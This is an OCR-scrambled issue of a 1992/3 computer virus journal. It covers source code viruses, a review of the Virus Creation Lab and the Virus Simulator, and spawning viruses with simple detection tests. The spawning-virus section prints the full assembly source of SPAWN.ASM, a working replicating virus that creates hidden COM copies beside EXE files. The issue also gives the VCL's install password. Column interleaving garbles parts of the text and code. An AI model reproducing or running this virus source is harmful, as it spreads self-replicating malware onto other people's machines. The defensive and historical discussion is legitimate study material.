cvdq1 2 PDF

Computer
Virus
Developments
Quarterly
The Independent Journal of Computer Viruses Volume 1, Number 2 — Winter, 1992/3
guages—just that they are very cumbersome. Assembly

Source Code Viruses: language has been the language of choice for serious
virus writers because one can accomplish the necessary
Fact or Fiction? manipulations much more efficiently.
A source code virus attempts to infect the source code
for a program—the C, PAS or ASM files—rather than
What is a Source Code Virus? the executable. The resulting scenario looks something
like this (Figure 1): Software Developer A contracts a
source code virus in the C files for his newest product.
Normally, when we think of a virus, we think of a The files are compiled and released for sale. The product
small, tight program written in assembly language, is successful, and thousands of people buy it. Most of the
which either infects executable program files or which
replaces the boot sector on a disk with its own code.
However, in the abstract, a virus is just a sequence of
instructions which get executed by a computer. Those Program A
instructions may be several layers remove from the Program A Executable
machine language itself. As long as the syntax of these Source Compile
instructions is powerful enough to perform the opera- Virus
tions needed for a sequence of instructions to copy itself, Compiled
a virus can propagate. For example, 2600 Magazine
recently published a batch file virus which can copy Virus as
itself from one batch file to the next.1 Although this Source Code
batch file virus depends on an executable file to get its
job done, it does not infect executable files at all. Distribution
Potentially, a virus could hide in any sequence of
instructions that will eventually be executed by a com-
puter. For example, it might hide in a Lotus 123 macro,
a Microsoft Word macro file, or a dBase program. Of
particular interest is the possibility that a virus could hide
in a program’s source code files for high level languages
like C or Pascal, or not-so-high level languages like
assembler.
Now I want to be clear that I am NOT talking about (Sterile on non-development machines)
the possibility of writing an ordinary virus in a high level
language like C or Pascal. Some viruses for the PC have Program A Program B (Active on
been written in those languages, and they are usually (not Executed in Source machines with
always) fairly large and crude. For example M. Valen’s Memory source files)
Pascal virus Number One2 is some 12 kilobytes big, and Virus as
then it only implements the functionality of an overwrit- Source
ing virus that destroys everything it touches. High level Virus
languages do not prove very powerful for writing viruses Program B
because they do not provide easy access to the kinds of Source
detailed manipulations necessary for infecting ex-
ecutable program files. That is not to say that such
manipulations cannot be accomplished in high level lan- Fig. 1: The modus operandi of a source code virus.
people who buy Developer A’s software will never even C File
have the opportunity to watch the virus replicate because
they don’t develop software and they don’t have any C
files on their system. However, Developer B buys a copy
of Developer A’s software and puts it on the system
where his source code is. When Developer B executes
Developer A’s software, the virus activates, finds a nice Compiler
C file to hide itself in, and jumps over there. Even though
Developer B is fairly virus-conscious, he doesn’t notice
that he’s been infected because he only does integrity
checking on his EXE’s, and his scanner can’t detect the Virus as
virus in Developer A’s code. A few weeks later, Machine Code
Developer B compiles a final version of his code and
releases it, complete with the virus. And so the virus Virus as Virus
spreads. . . . Source Code
While such a virus may only rarely find its way into
code that gets widely distributed, there are hundreds of
thousands of C compilers, etc., out there, and potentially
millions of files to infect. The virus would be inactive as
far as replication goes, unless it was on a system with
source files. However, a logic bomb in the compiled EXE File
version could be activated any time an executable with
the virus is run. Thus, all of Developer A and Developer Fig. 2: The two lives of a source code virus.
B’s clients could suffer loss from the virus, regardless of
whether or not they developed software of their own.
Source code viruses also offer the potential to migrate data ends up being a copy of the source code inside of the
across environments. For example, if a programmer was executable. The executing virus routine then just copies
doing development work on some Unix software, but he the virus-as-data into the file it wants to infect. Alterna-
put his C code onto a DOS disk and took it home from tively, if one is willing to sacrifice portability, and use a
work to edit it in the evening, he might contract the virus compiler that accepts inline assembly language, one can
from a DOS-based program. When he copied the C code write most of the virus as DB statements, and do away
back to his workstation in the morning, the virus would with having a second copy of the source code worked in
go right along with it. And if the viral C code was as data. The DB statements will just contain machine
sufficiently portable (not too difficult) it would then code in ASCII format, and it is easy to write code to
properly compile and execute in the Unix environment. convert from binary to ASCII. Thus the virus-as-instruc-
A source code virus will generally be more complex tions can make a compileable ASCII copy of itself
than an executable-infector with a similar level of directly from its binary instructions. Either approach
sophistication. There are two reasons for this: (1) The makes it possible for the virus to survive a compile and
virus must be able to survive a compile, and (2) The close the loop in Figure 2.
syntax of a high level language (and I include assembler Obviously, a source code virus must place a call to
here) is generally much more flexible than machine itself somewhere in the program source code so that it
code. Let’s examine these difficulties in more detail: will actually get called and executed. Generally, this is a
Since the virus attacks source code, it must be able to more complicated task when attacking source code than
put a copy of itself into a high-level language file in a when attacking executables. Executables have a fairly
form which that compiler will understand. A C-infector rigid structure which a virus can exploit. For example, it
must put C compileable code into a C file. It cannot put is an easy matter to modify the initial CS:IP value in an
machine code into the file because that won’t make sense EXE file so that it starts up executing some code added
to the compiler. However, the infection must be put into to the end of the file, rather than the intended program.
a file by machine code executing in memory. That Not so for a source file. Any virus infecting a source file
machine code is the compiled virus. Going from source must be capable of understanding at least some rudimen-
code to machine code is easy—the compiler does it for tary syntax of the language it is written in. For example,
you. Going backwards—which the virus must do—is the if a virus wanted to put a call to itself in the main()
trick the virus must accomplish. (Figure 2) routine of a C program, it had better know the difference
The first and most portable way to “reverse the com- between
pile,” if you will, is to write the viral infection routine
twice— once as a compileable routine and once as ini-
tialized data. When compiled, the viral routine coded as
2 Computer Virus Developments Quarterly, Vol 1, No 2

/* developer, so chances are the behavior checker that is set
void main(int argc, char *argv[]) {
This is just a comment explaining how to up to check everything all the time will be an extreme
do_this(); The program does this nuisance, and it will often get turned off. The same can
and_this(); And this, twice.
and_this(); be said of integrity checkers.
. . . } Likewise, the usual advice of confining your software
*/ purchases to shrink-wrapped packages from the
manufacturer may not be the answer here. Since the virus
and is compiled in, rather than attached out in the field, after
void main(int argc, char *argv[]) { compilation, it would tend to come shrink-wrapped for
do_this(); you.
and_this();
and_this(); Yet not all is bad news. The first line of defense
. . . } against source code viruses may be low-tech, not high-
tech!
or it could put its call inside of a comment that never gets Obviously the weak link in hiding a source code virus
compiled or executed! is that it has to sit right there in the source file, visible for
Source code viruses could conceivably achieve any inspection. While such viruses can implement tricks to
level of sophistication in parsing code, but only at the make them less noticeable (e.g. storing the code out past
expense of becoming as large and unwieldy as the com- column 80 so the editor won’t show it up unless you
piler itself. Normally, a very limited parsing ability is scroll over there) they can be identified—at least as a
best, along with a good dose of politeness to avoid caus- strange chunk of code—if someone looks through his
ing problems in questionable circumstances. source code files carefully. That’s not always as easy as
So much for the two main hurdles a source code virus it sounds. Large programs might consist of hundreds of
must overcome. small files, or files consisting of thousands of lines of
Generally source code viruses will be large compared code. Looking at it carefully doesn’t come naturally.
to ordinary executable viruses. Ten years ago that would Likewise, looking only for changes in existing files is not
have made them impossible on microcomputers, but enough. A virus can hide large chunks of code in include
today programs hundreds of kilobytes in length are the files, etc., so one must also keep an eye out for new files
norm. So adding 10 or 20K to one isn’t necessarily that shouldn’t be there.
noticeable. Presumably the trend toward bigger and big- For serious developers, a version control system will
ger programs will continue, making the size factor much be helpful. Essentially, such a system establishes a
less important. master copy of your source code (perhaps on your file
server) and allows development work to be done on
Is there a reasonable way to combat copies (on the workstations). The master copies must be
such viruses? updated one-by-one with explicit operator input. These
systems would allow a wary programmer to spot such a
Traditional methods of virus detection and eradica- virus if he saw a file that had been changed that shouldn’t
tion don’t work too well against source code viruses. For have been changed. Of course a lazy programmer would
example, the source code virus will normally only exist sidestep the safeguard that a version control system
in compiled form. The actual source code will only be might offer him.
duplicated when it finds source files to infect. Thus, to be The second step to eliminating such a virus is
effective, a scanner would have to search for the virus in diligence. If you do find some strange code, follow it up.
binary files. However, since those files are compilations, Understand what it’s doing. If it is viral, you can search
the exact machine code which the virus is implemented the rest of your source code for it, and you don’t even
with can vary widely. Everything from compiler ver- need a scanner. A disk/file utility like PC Tools is quite
sions to optimization switches can affect the code sufficient. Locating the executable that contains it is a bit
produced. Even the usual linking process will alter trickier, but I trust you could figure out how to trap it.
numerous jump and call references in the viral code. As So one of the keys to stopping source code viruses is
if that weren’t enough, the virus may consist of little awareness, combined with reasonable precautions. If no
more than routine calls to standard library functions. As one is looking for them, or if the people who should be
such, scanning would be prone to false alerts, and false watching out get lazy, a virus could easily slip in. Some-
negatives. Likewise, it is an easy matter for the virus to one who is aware of their existence and is diligent to
encrypt the virus-as-data in the executable form, so it is implement some controls has a pretty good chance of
not recognized as a source code version of the virus. catching anything that’s out there for now.
Behavior checkers will have a hard time tracking a 1. Frosty of the GCMS, “A Batch Virus,” 2600 , Spring, 1992, p. 8.
source code virus as well. Updating a source code file is 2. Ralf Burger, Computer Viruses and Data Protection, (Abacus,
not an especially unusual occurrence for a software Grand Rapids, MI:1991), p. 252.
Computer Virus Developments Quarterly, Vol 1, No 2 3

disk—perhaps it did temporarily, in memory). Rather, it
The Dark Origin of sounds like a hybrid sort of virus, which could only exist
in a compiler. None the less, this story (which is admit-
Source Code Viruses tedly third hand) establishes the existence of viral tech-
nology in the seventies. It also suggests again that these
early viruses were not too unlike the source code viruses
Source code viruses have been shadowy underworld I’m discussing here.
denizens steeped in mystery until now. Some of my One might wonder, why would the government be
enemies might accuse me of having invented them—a interested in developing viruses along the lines of source
new evil unleashed on the world. On the contrary, I think code viruses, rather than as direct executables? Well,
these ideas may actually pre-date the more modern idea imagine you were trying to invade a top-secret Soviet
of what a virus is. computer back in the good ol’ days of the Cold War.
Many people credit Fred Cohen with being the inven- From the outside looking in, you have practically no
tor of viruses. Certainly he was the first to put a coherent understanding of the architecture or the low level details
discussion of them together in his early research and of the machine (except for what they stole from you).
dissertation, published in 1986. However, I remember But you know it runs Fortran (or whatever). After a lot of
having a lively discussion of viruses with a number of hard work, you recruit an agent who has the lowest
students who worked in the Artificial Intelligence Lab at security clearance on this machine. He doesn’t know
MIT in the mid-seventies. I don’t remember whether we much more about how the system operates than you do,
called them “viruses,” but certainly we discussed but he has access to it and can run a program for you.
programs that had the same functionality as viruses, in Most computer security systems designed before the
that they would attach themselves to other programs and mid-80’s didn’t take viral attacks into account, so they
replicate. In that discussion, though, it was pretty much were vulnerable to a virus going in at a low security level
assumed that such a program would be what I’m calling and gaining access to top secret information and convey
a source code virus. These guys were all LISP freaks it back out. (See Cohen’s Short Course for more details.)
(and come to think of it LISP would be a nice language Of course, that wasn’t a problem since there weren’t any
to do this kind of stuff in). They weren’t so much the viruses back then. So what kind of virus can your agent
assembly language tinkerers of the eighties who really plant? A source virus seems like a mighty fine choice in
made a name for viruses. this case, or in any scenario where knowledge of the
The whole discussion we had was very hypothetical, details of a computer or operating system is limited.
though I got the feeling some of these guys were trying That’s because they’re relatively portable, and inde-
these ideas out. Looking back, I don’t know if the discus- pendent of the details.
sion was just born of intellectual curiosity or whether Of course, much of what I’ve said here is speculative.
somebody was trying to develop something like this for I’m just filling in the holes from some remarks I’ve heard
the military, and couldn’t come out and say so since it and read here and there over the course of two decades.
was classified. (The AI Lab was notorious for its secret We may never know the full truth. However it seems
government projects.) I’d like to believe it was just idle fairly certain that the idea of a virus, if not the name,
speculation. On the other hand, it wouldn’t be the first dates back before the mid 80’s. And it would also appear
time the military was quietly working away on some idea that these early ideas involved viruses quite unlike the
that seemed like science fiction. neat little executables running amok on PC’s these days.
The next thread I find is this: Fred Cohen, in his book So there you have the inspiration for the source code
A Short Course on Computer Viruses, described a spe- virus.
cial virus purportedly put into the first Unix C compiler
for the National Security Agency by Ken Thompson.1 It 1. Frederick B. Cohen, A Short Course on Computer Viruses, (ASP
was essentially designed to put a back door into the Unix Press, Pittsburgh, PA:1990), p. 82.
login program, so Thompson (or the NSA) could log into
any system. Essentially, the C compiler would recognize Computer Virus Developments Quarterly is published
the login program’s source when it compiled it, and quarterly by American Eagle Publications, Inc., PO Box
modify it. However, the C compiler also had to recognize 41401, Tucson, AZ 85717 at an annual subscription rate
of $75 ($85 overseas). ISSN 1065-8246. Computer
another C compiler’s source, and set it up to propagate Virus Developments Quarterly is C Copyright 1993 by
the “fix” to put the back door in the login. Although American Eagle Publications, Inc. All rights reserved.
Thompson evidently did not call his fix a virus, that’s Any copying by photographic, electronic, or other means
what it was. It tried to infect just one class of programs: without the express written permission of the publisher
C compilers. And its payload was designed to miscom- is strictly prohibited. All copyright violations will be
prosecuted to the full extent of the law. Paid subscribers
pile only the login program. This virus wasn’t quite the may use code presented in CVDQ for non-commercial
same as a source code virus, because it didn’t add any- experimentation on a single, single-user, non-net-
thing to the C compiler’s source files (at least, not on worked computer.

Appending, Overwriting, or Spawning viruses, and
The Virus Creation Lab Trojan Horses or Logic Bombs. There are options to
infect EXE’s, and/or COM’s, TSR capability, Trace
Stopping, and Encrypting, options to define how the
Well, it seems all the world is finding out about the virus searches for files to infect, and options to set the
Virus Creation Lab and yelling various notes of woe. reproduction rate. But wait a minute! I can’t just mix and
What is the Virus Creation Lab (VCL for short)? match anything I’d like. If I want an overwriting virus
Released by a hacker who calls himself Nowhere (which just destroys the file it infects) I can have some-
Man, the VCL is a menu-driven program to design your thing that infects COM and EXE files. Big deal. Over-
own virus. It has the look and feel of any of a host of writing viruses are pretty dumb. Alan Solomon describes
DOS-based programs that have a list of menu options them as “negative stealth”3 and rightly so. They’re pretty
across the top, and pull-down menus under each one. It hard not to notice, and easy to kill. In short, these things
allows you to select the type of virus, trigger routines, are doomed to extinction from the start. (Most overwrit-
and amusing/destructive actions to take when triggered. ing viruses are extinct, in as much as they are not normal-
I am rather sorry to see that the reaction to the release ly found in the wild.) If I want a more sophisticated
of the VCL has been so unintelligent—but from my own appending virus, I can only get a COM infector. Disap-
experiences I know that is the acceptable norm pointing. Well, if I choose a spawning virus I can get an
nowadays. From the dates on the files I have, the VCL EXE infector. (I never did figure out how to get anything
appears to have been released in July, 1992. Recently, it to go TSR, even though there is a menu option for it.)
has been getting mention in the press here and there, Now realize, a “spawning virus” isn’t real sophisti-
along with typical calls for legislation to “quash virus- cated—not even a virus in the proper sense of the word.
authoring software and books,” and suggestions that It is simply a program that looks for EXE programs and
programs like this will make “today’s virus problems creates a COM program with the same name as the EXE,
look like the ‘good ol’ days’.”1 with the Hidden, System and Read Only bits set so you
That kind of hype may sell more anti-virus software, can’t see it. Since DOS defaults to executing COM files
but its not going to help anybody realistically asses the first, when you type the name of the program you want
VCL and what it means for them. So I’d like to go to run, the (viral) COM file gets executed instead of the
through the VCL here and look at it. I’ll describe it in EXE you wanted. That viral program reproduces (and
some detail, even though it is included on the program possibly does some damage). Then it runs the EXE you
disk with this issue. I realize that not everyone will not really wanted, so nothing appears to be wrong with it.
fire it up. Seeing as it was written by a hacker whom I do While such viruses can be irritating to the unsuspecting
not know and who does not care to talk about it, one user, they are extremely easy to discover. (See Spawning
cannot assume that the program is safe. Particularly, one Viruses, this issue.) Most anti-virus packages check for
cannot be sure that the VCL itself (or the install program them generically, too. As such, they are hardly a menace
for it) does not either do direct damage to any files, etc., to the wary user.
or does not release a virus. As far as I can tell it is safe, In short, the VCL leaves the would-be virus author
but that is no guarantee at all. Once we discuss the logic with very minimal functionality. It cannot even generate
bombs it is capable of creating, you will see what I mean. viruses as sophisticated as some of the first-ever viruses,
e.g. a Jerusalem or a Brain.
The Test Drive Moving on to some of the other features, the VCL gets
a little more interesting. The Effects screen offers ten
The VCL comes in an encrypted ZIP file which must “empty slots” where you can ask the virus to perform
be installed with an install program. The install proceeds various functions when a given logical condition is ful-
smoothly so long as PKUNZIP is in your path and you filled. The stock effects are:
are privy to the secret password needed to unlock it.2
Beep PC speaker Play a tune
Once installed on your disk, you can’t move the files to Change low ram Print a string
another machine or it won’t work—you must re-install Clear screen Drop to ROM Basic
Cold reboot Send string to COM port
it. Corrupt files Swap two COM ports
Once installed, you’ll find the VCL itself, some Disable LPT port Trash a disk
documentation and eight ready-to-go sample viruses. Disable PrtScn Trash some disks
Disable COM port Display an ANSI
Firing up the VCL brings you to a screen with a large Display a string Warm Reboot
box, and several menu choices across the top. So far it Drop a program Erase files
Lock up computer Machine gun sound
doesn’t look too different from most software. Out value to port Out random to ports
Scrolling over to the Options selection, let’s find out
what kinds of viruses we can create. . . . My first reaction and you can add other custom effects, coded in assembler,
is that this thing looks impressive. We have our choice of to the list. Instructions for doing this are included in the

documentation. Move to an “empty slot” and hit <Enter>. I would suppose any other detector worth its salt would
A pop-up menu appears giving you your choice of effects. catch them too.
Select one—say “Machine Gun Sound”—and you get a In reality, I think the biggest threat from the current
new pop-up, the Set Conditions screen. This screen allows VCL is to the unsophisticated user who gets ahold of the
you to pick a logical combination of up to 5 conditions thing. Just about anyone can put together a virus with it,
which will trigger the desired effect. It is a pain to use, as even if they know nothing about viruses. Having just
it isn’t intuitive at all. But the Help function will get you created a virus, the temptation to run it and see what it
through. Anyhow, you have a wide variety of trigger does is often irresistable. Oops . . . where did it go? What
possibilities. The stock triggers are: did it do? So here is a new tool for the casual user to
thoroughly louse up his system. (If FDISK isn’t enough.)
Country code CPU type John Gibson wrote of an imaginary scenario in which
Day DOS version
EMS Memory No of game ports a kid got even with an enemy by giving him a VCL-
Hour No of floppies created virus which was intended to attack his father’s
Minute
Number of LPT ports
Month
RAM memory company.4 In fact, the wiser thing to do might be to give
Random number Clock rollover the enemy the VCL as a peace-offering, and then let him
Second No of COM ports screw things up for himself. There could be no criminal
Weekday Year
All files infected Under 4DOS charges over such a transaction, and I think it would be
just as effective, provided the enemy was new to viruses.
and again, you may add your own. Each trigger has a Beyond this, though, the VCL seems like little more
Routine Name, an Operator and a Value. So you could, for than a toy. Nowhere Man’s claim that the VCL is “a
example, trigger when Month == 10, or when Month != 10, product to re-define the virus-writing community” is all
etc., etc. The biggest pain is that you have to go through boast and no bite. The media hype is unwarranted, unless
and enter all 5 triggers, even if you only want one. You you’re trying to sell anti-virus software. But, yes, you’d
have to set every one you don’t want to “None.” In this probably better make sure you can catch these things.
way, you fill up the empty slots in the Effects menu. After all, there have been over a hundred new virses
If you can work through the less-than-friendly inter- created with it already.
face, though, the Effects menu can give you a real educa- Of course, Nowhere Man promises his users lots of
tion. It’s easy to design a virus that will give some very goodies in an upcoming version, including:
interesting, and complicated effects—up to 10 different
ones in a single virus. It gives you an appreciation for the * Appending .EXE virii
* More effects and conditions
great variety of logic “bombs” one could create and * Boot sector virii
attach to a virus. I put bombs in quotes because these * Terminate and Stay Resident (TSR) virii
* Virex-Protection(C) — defeats all TSR anti-virus
things could range from playful to devastating, and from products!
elusive to obvious. Sitting down and designing a few * Cryptex(C) encryption scheme — every virus
produced has its own special encryption method!
viruses with complicated effects will give you a feel for No two are alike!
just what is possible—in a much more lively fashion than * Improved environment (maybe even a Windows IDE,
just pondering it. THAT is why I said that just because too)
the VCL looks safe, it doesn’t mean that it is.
Ok, go to the File menu and save your work in a This version is due out any day, I am told, but no one has
special .VCL file. Now go to Make and generate the seen it yet. If he delivers on this, the VCL could become a
.ASM file. All done. Now, assemble it with TASM (the lot more dangerous. The viruses won’t be so lame, and
assembler Nowhere Man recommends). If you’re lucky, they’ll be harder to detect.
it’ll compile without errors. Sometimes you won’t be so Even so, I do not believe the VCL and similar
lucky though. VCL isn’t thoroughly debugged, and it can “products” will ever re-define virus writing. Code is
generate some strange code. code, and it is just about as easy to detect one stand-alone
virus as a whole class of them, provided that that class is
mechanically generated, and you know the algorithm for
Is the VCL a Major Threat? that mechanical generation process. Thus, I cannot see
the VCL becoming a major threat, unless it gives the user
As it stands, not at all. an almost unlimited capability to modify the technology
The viruses it creates are lame, as far as viruses go. that the actual virus employs in spreading. Even then,
Certainly they are not wortly of fear-inspiring articles in only an expert programmer, who could just as well write
Infoworld.4 Virus detectors are quickly being updated to a virus from scratch, will ever make use of that
catch the VCL generated viruses. I tested McAfee’s capability.
shareware SCAN (Version 8.9B97) and it caught every
VCL virus I created, regardless of the options I selected.

Where are tools like the VCL going?
In the future, widespread use of the VCL, and similar
“products” will drive people away from categorizing
“Spawning” Viruses
viruses by trigger dates and what not. With all the viruses
out there now, you can pretty much assume that any day As discussed elsewhere in this issue, a spawning
is a good day for a virus to trigger anyway. The VCL just virus spreads by using a simple feature of DOS. When
puts the icing on this cake with its rich variety of effects one issues a command to the command interpreter in
and triggers. Likewise, it should be another nail in the DOS, it will first attempt to find and execute a COM file
coffin for marketing hype over how many viruses a by that name. If none is found, it will then attempt to find
given product will detect. and execute an EXE file instead. A replicating program
I would guess that if Nowhere Man were smart, he can exploit this prioritization to “infect” EXE files. (I put
would step back from his lofty goal. He’s gotten a lot of infect in quotes, because the EXE is never really
media attention, though, and I suspect he’ll continue touched.)
work on Version 2.0. I don’t suspect it will be much Suppose I have a program DOIT.EXE on disk. A
more of a threat to anyone who stays up to date with self-reproducing program searching for EXE’s could
virus detection technology. find it a nd crea te a ne w copy of itse lf named
None the less, I wouldn’t write off VCL-type systems DOIT.COM. With both DOIT.EXE and DOIT.COM in
completely. The real strength of VCL is in custom- th e sa me d ire c tor y, D OS will alw a ys ex ec ute
designing logic bombs, and it will create a stand-alone DOIT.COM when I type “DOIT” at the prompt. Of
logic bomb for you. In a few years, I imagine such tools course, this would be immediately, because DOIT would
could start to specialize in this way. The virus writer no longer do it. So the viral DOIT.COM must also go out
might custom design a virus, possibly using tools like the and explicitly execute DOIT.EXE. Then DOIT.COM
Dark Avenger’s Mutation Engine. Then, to design a can quietly move around, while giving the appearance
logic bomb, he might pull out his VCL-style utility and that all is well. Of course, an alert user might notice a lot
code it up. The fact that the utility puts out fairly standard of new COM files appearing on his disk. That can be
code isn’t a big problem as long as that code is buried avoided if the COM files which the virus creates are all
within a custom designed and encrypted virus. Special- made hidden.
ized utilities like this could eventually become very
smart, employing artificial intelligence style triggers,
etc., to go attack a highly specific target, even if all the A VCL-Generated Spawning Virus
details about how to identify that target are not known.
The situation reminds me of when automatic code- Let’s take a look at a simple spawning virus
generating programs started appearing. The successful generated by the Virus Creation Laboratory. This virus,
ones specialized, focusing on routine tasks, like user SPAWN.ASM, contains no destructive code and stays
interface design. Writing a program that will generate within the current subdirectory, so it is fairly safe.
code for any other program easily is absurdly compli- SPAWN.COM basically does four things:
cated. However, generating a user interface is not. In the
same way, I suspect automatic code generating programs (1) It re-sizes the memory block allocated for it, so there will
be room to run the EXE in memory,
for virus writing, etc., will eventually specialize in areas
(2) It executes the EXE associated to it,
where they can be most successful. (3) It searches for, and possibly infects a new EXE, and
(4) It returns control to DOS.
1. Compute, December, 1992, p. 192.
2. “Chiba City”—case sensitive.
3. Alan Solomon, “Uncovering the Secrets of Stealth Viruses,” Info These steps are taken by the MAIN procedure in the code.
Security Product News, September, 1992, p. 25. The SEARCH_FILES procedure is a straightforward DOS
4. John Gibson, “,” InfoWorld, December 7, 1992. Function 4E/4F search, with a call to INFECT_FILE
every time the search finds an EXE.
The infect routine takes the EXE file’s name and puts
a COM extent on it. It then attempts to open the COM
file. If successful, it assumes the file is already infected,
and returns to the SEARCH_FILES procedure with the
carry flag set. If it cannot open the COM file, it creates
one—a copy of itself, with the new EXE name inserted
in the variable SPAWN_NAME.
The code, as generated by the VCL is simple and
straightforward, and the comments are pretty good for

;This is the main control routine of the virus.
an automatically generated program. As such I have left main proc near
it pretty much the same as originally generated. mov

mov
ah,04Ah ;DOS resize memory function
bx,(finish - start) / 16 + 0272h ;BX holds # of para.
int 021h ;why 272H ?? I don’t know
mov sp,(finish - start) + 01100h ;Change top of stack

Protection Techniques mov
int
si,offset spawn_name
02Eh
;SI points to true filename
;DOS execution back-door
push ax ;Save return value for later
These viruses aren’t a big threat IF you’re aware of mov

mov
ax,cs
ds,ax
;AX holds code segment
;Restore data segment
their existence and you keep your eyes open for them. It mov es,ax ;Restore extra segment
call search_files ;Find and infect a file

is easy to do a generic check for spawning viruses. All pop ax ;AL holds return value
you have to do is search a system for EXE’s and see if mov
int
ah,04Ch
021h
;DOS terminate function
there are COM files by the same name on the system. If main endp
;*****************************************************************************
there are, it’s possibly a virus. Likewise, one can search ;This routine searches for EXE’s and infects them.
for hidden COM files of dubious origin. A more sophis- search_files proc
mov
near
dx,offset exe_mask ;DX points to “*.EXE”
ticated spawning virus might hide and rename the EXE call
done_searching: ret
find_files ;Try to infect a file
;Return to caller
file to something else and then leave an unhidden COM exe_mask db “*.EXE”,0 ;Mask for all .EXE files
search_files endp
file with the proper name on the system. A sophisticated find_files proc near
user might notice his EXE’s were changing to COM’s, push bp ;Save BP
but I would guess the average user would not. To protect mov
int
ah,02Fh
021h
;DOS get DTA function
push bx ;Save old DTA address

from a generic attack of this sort, you must make a list of
mov bp,sp ;BP points to local buffer
EXE’s on your system, and then note if any change to sub sp,128 ;Allocate 128 bytes on stack
COM files at a later date. push

mov
dx
ah,01Ah
;Save file mask
;DOS set DTA function
Ideally, your anti-virus software ought to be able to lea
int
dx,[bp - 128]
021h
;DX points to buffer
perform these functions. Unfortunately, many packages mov

mov
ah,04Eh
cx,00100111b
;DOS find first file function
;CX holds all file attributes
do none of them. To check yours out, you might want to find_a_file:
pop
int
dx
021h
;Restore file mask
do the following: jc
call
done_finding
infect_file
;Exit if no files found
;Infect the file!
jnc done_finding ;Exit if no error
mov ah,04Fh ;DOS find next file function
jmp short find_a_file ;Try finding another file
(1) Take any old (and preferably small) file you don’t need
done_finding: mov sp,bp ;Restore old stack frame
and rename it to a COM file with the same name as an EXE mov
pop
ah,01Ah
dx
;DOS set DTA function
;Retrieve old DTA address
in the same directory. For example, I have a program int 021h
MS.EXE. I could just take any text file and rename it to pop
ret
bp ;Restore BP
;Return to caller
MS.COM. If you have a disk utility, go ahead and make find_files endp
the COM file hidden. Now scan your system. Does your ;*****************************************************************************
;This routine infects the file specified in the DTA search block, if it can,
scanner alert you to the presence of the COM file? (Delete ;and returns with C set if it could not infect.
infect_file proc near
the COM file when you are done!) mov
int
ah,02Fh
021h
;DOS get DTA address function
mov di,bx ;DI points to the DTA

(2) Copy an existing EXE file off of your disk and replace it
lea si,[di + 01Eh] ;SI points to file name
with a small file renamed to the same name with the extent mov dx,si ;DX points to file name, too
mov di,offset spawn_name + 1;DI points to new name
COM. Does your anti-virus notice the change? (Again, xor ah,ah ;AH holds character count
transfer_loop: lodsb ;Load a character
delete the COM file and replace the EXE when you’re or al,al ;Is it a NULL?
je transfer_end ;If so then leave the loop
done testing.) inc
stosb
ah ;Add one to the character count
;Save the byte in the buffer
jmp short transfer_loop ;Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah;First byte holds char. count
These are real basic tests. If your software doesn’t pass, I’d mov byte ptr [di],13 ;Make CR the final character
recommend you protest to the manufacturer. And while mov

xor
di,dx
ch,ch
;DI points to file name
;
mov cl,ah ;CX holds length of filename
they’re working on an update, use the little program repne
mov
scasb
al,’.’ ;AL holds char. to search for
;Search for a dot in the name
CHECKSP included on the program disk with this issue. mov
mov
word ptr [di],’OC’
byte ptr [di + 2],’M’
;Store “CO” as first two bytes
;Store “M” to make “COM”
It keeps track of such things pretty well. mov byte ptr [set_carry],0 ;Assume we’ll fail
mov ax,03D00h ;DOS open file function, r/o
int 021h
jnc infection_done ;File already exists, so leave
SPAWN.ASM Source Listing mov
mov
byte ptr [set_carry],1
ah,03Ch
;Success — the file is OK
;DOS create file function

mov cx,00100111b ;CX holds file attributes (all)
int 021h
xchg bx,ax ;BX holds file handle
The following will assemble with TASM 2.0 or mov ah,040h ;DOS write to file function
mov cx,finish - start ;CX holds virus length
MASM 5.0 (and probably others) to a COM file. mov dx,offset start ;DX points to start of virus
int 021h
mov ah,03Eh ;DOS close file function

;SPAWN.ASM int 021h
;Created with Nowhere Man’s Virus Creation Laboratory v1.00
;Written by Turtle Brain infection_done: cmp byte ptr [set_carry],1 ;Set carry flag if failed
ret ;Return to caller
virus_type equ 2 ;Spawning Virus
is_encrypted equ 0 ;We’re not encrypted ;*****************************************************************************
tsr_virus equ 0 ;We’re not TSR ;Data area. Spawn name is the EXE file name, formatted for a DOS Int 2E.
;Int 2E passes a command to COMMAND.COM. The format of the command is:
code segment byte public ;1 byte which specifies the length of the command, in bytes, then the command,
assume cs:code,ds:code,es:code,ss:code ;in ASCII format, terminated by a carriage return (13).
org 0100h spawn_name db 12,12 dup (?),13 ;Name for next spawn
set_carry db ? ;Set-carry-on-exit flag
start label near infect_file endp
;*****************************************************************************

vcl_marker db “[VCL]”,0 ;VCL creation marker
finish label near

purpose of some dark deed. That’s a hard way to go.
code ends
Likewise modifying Simulator viruses to make them
end main
infect other files is harder than writing one from scratch
(yes, I tried it). Any quick and dirty mods are quickly
noticed by the programs themselves, resulting in a hung
system.
The nice thing about an MtE simulator is that it can
Doren Rosenthal provide a strong signature-analysis test. The only thing
one really sees in the code are the MtE-generated
Does It Again! decryption routines, since it encrypts everything else.
Thus, a limited-function virus such as those produced by
the Simulator should be detected by a generic-MtE check
In the last issue we interviewed Doren Rosenthal, performed by any anti-virus software.
author of the Virus Simulator. he had been widely con- Some people have complained that just because some
demned for writing a program which would actually test anti-virus program doesn’t catch Simulator-generated
anti-virus software. Now he has released a new update viruses, it doesn’t mean it will miss the real viruses. That
for the Simulator, which he calls the MtE Supplement. It is not true in this case, since MtE-generated code is all a
uses the Dark Avenger’s Mutation Engine to test out the scanner will ever get to look at. The Simulator will help
ability of a scanner to detect mutation engine viruses. If you draw the line between an anti-virus product that
you sent off for a copy of the Simulator, I’m told you’ll detects only limited variations of the Mutation Engine,
get a copy of the MtE Supplement at no charge. and one that detects it generically, when all of its stand-
This new release is causing quite a stir—primarily ard options are exercised.
because it shows up glaring weaknesses in most of the It would appear that a number of anti-virus product
anti-viral products on the market today. I tested it out and developers have taken an extremely reactive position.
YIPES! The MtE simulated viruses really do replicate, Rather than detecting the mutation engine itself, they
just like real viruses. (They only infect the special test only detect a few specific viruses that have used it,
files, though.) As such, they are not really simulated possibly without exercizing all of its options.
viruses so much as they are “limited function” viruses. If you need to test anti-virus products, or demonstrate
And nobody seems to be catching these things reliably. how they work, then I unreservedly recommend the
One-in-three looks like the average hit rate. And yet you Simulator, now more than ever. Get it from Rosenthal
can take the files that didn’t get caught and execute them Engineering, PO Box 1650, San Luis Obispo, CA 93406.
and watch them replicate all over the place. (And by the way, I’m not making any money on this.—
Vendors will have a hard time finding excuses for ML)
why their detectors don’t work with it, too, since it uses
the real mutation engine.
Comments about the MtE Supplement on Virus-L in
